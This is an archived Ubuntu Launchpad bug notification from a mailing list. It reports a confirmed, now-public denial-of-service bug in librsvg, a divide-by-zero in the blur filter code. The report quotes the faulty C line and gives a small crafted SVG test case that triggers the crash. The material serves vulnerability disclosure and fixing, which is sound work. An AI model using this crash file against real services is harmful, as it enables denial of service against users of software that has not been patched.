[Touch-packages] [Bug 1697283] Re: Denial of Service Vulnerability in Librsvg

Marc Deslauriers Fri, 18 Aug 2017 06:36:16 -0700

** Information type changed from Private Security to Public Security

** Changed in: librsvg (Ubuntu)
       Status: New => Confirmed


-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to librsvg in Ubuntu.
https://bugs.launchpad.net/bugs/1697283

Title:
  Denial of Service Vulnerability in Librsvg

Status in librsvg package in Ubuntu:
  Confirmed

Bug description:
  An SIGFPE is raised in function box_blur_line of rsvg-filter.c when
  the librsvg try to parse a craft SVG file.

  https://github.com/GNOME/librsvg/blob/master/rsvg-filter.c#L1439

  if (output >= 0)
      dest[bpp * output + i] = (ac[i] + (coverage >> 1)) / coverage;
  }

  The coverage could be zero.

  testcase.svg

  <svg width="100" height="120"
   xmlns="http://www.w3.org/2000/svg";
   xmlns:xlink="http://www.w3.org/1999/xlink";>

    <filter id="blurMe">
      <feGaussianBlur in="SourceGraphic" stdDeviation="0.053192302807822195 20" 
/>
    </filter>

    <circle cx="50" cy="50" r="50" fill="green"
            filter="url(#blurMe)" />
  </svg>

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/librsvg/+bug/1697283/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1697283] Re: Denial of Service Vulnerability in Librsvg

Reply via email to